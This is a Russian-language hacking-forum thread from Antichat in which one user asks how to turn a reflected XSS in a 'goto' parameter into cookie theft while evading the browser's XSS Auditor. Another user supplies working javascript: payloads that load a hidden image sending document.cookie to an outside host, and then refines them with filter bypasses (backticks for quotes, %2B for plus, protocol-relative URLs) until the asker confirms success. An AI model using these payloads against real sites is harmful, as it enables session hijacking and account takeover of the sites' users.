Форум АНТИЧАТ - Как заюзать reflective XSS?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - Как заюзать reflective XSS? (https://forum.antichat.xyz/showthread.php?t=454401)

Dominant

07.08.2017 23:54

Есть reflected XSS и вот такой код отрабатывает:

javascript:alert(1)

Но вот такой:

">alert(1)

проходит но уже блочится xss auditor-oом.

Можно как-то слить куки не добавляя внутрь страницы ?

crlf	08.08.2017 01:22

Можно так:

Код:

javascript:i=document.createElement('img');i.style.display='none';i.src='http://localhost/?'+escape(document.cookie);console.log(document.body.appendChild(i));

Если есть переносы строк или символы ломающие синтаксис, то нужно использовать urlencode.

Dominant

08.08.2017 16:10

Забыл упомянуть важную деталь. Инъекция в коде страницы отображается как атрибут src:

src="javascript:alert(1)"

Когда добавляю этот код:

javascript:i=document.createElement('img');i.style .display='none';i.src='http://localhost/?'+escape(document.cookie);console.log(document.bo dy.appendChild(i));

то не отображается и не отрабатывает никак

crlf	08.08.2017 16:49

Цитата:

Сообщение от Dominant

↑
Инъекция в коде страницы отображается как атрибут src

Выложи сюда, посмотрим.

Dominant

08.08.2017 17:02

Код:

site.com/index.php?goto=javascript:alert(1);

Вот такой запрос даёт:

Код:

Такой

Код:

site.com/index.php?goto=">alert(a);

Даёт:

Код:

alert(a);" name="main" scrolling="auto" NORESIZE frameborder="0" marginwidth="20" marginheight="20" border="no">

но блочится xss аудитором

Такой:

Код:

site.com/index.php?goto=javascript:i=document.createElement('img');i.style.display='none';i.src='http://localhost/?'+escape(document.cookie);console.log(document.body.appendChild(i));

не выдает ничего

crlf	08.08.2017 17:23

У меня нормально отрабатывает:

http://s018.radikal.ru/i512/1708/13/002a4d5c8506.png

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
   

[/COLOR][/COLOR]

Dominant

08.08.2017 17:36

Цитата:

Сообщение от crlf

↑
У меня нормально отрабатывает:
http://s018.radikal.ru/i512/1708/13/002a4d5c8506.png

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
   

[/COLOR][/COLOR]

Но при вводе такого кода в адресную строку - фрейм вообще не добавляется.

Проверил - сбой происходит на "http://". Если убрать их из скрипта то всё добавляется в src но кавычки фильтруются:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]

Без указания протокола нормально

crlf	08.08.2017 18:29

Кавычку можно бэктиком (`) заменить. Плюс нужно заменить на %2B.

Код:

site.com/index.php?goto=javascript:i=document.createElement(`img`);i.style.display=`none`;i.src=`//localhost/aaaaaaa?`%2Bescape(document.cookie);console.log(document.body.appendChild(i));

Dominant

08.08.2017 21:44

Цитата:

Сообщение от crlf

↑
Кавычку можно бэктиком (`) заменить. Плюс нужно заменить на %2B.

Код:

site.com/index.php?goto=javascript:i=document.createElement(`img`);i.style.display=`none`;i.src=`//localhost/aaaaaaa?`%2Bescape(document.cookie);console.log(document.body.appendChild(i));

Вот так заработало. Спасибо

Время: 01:55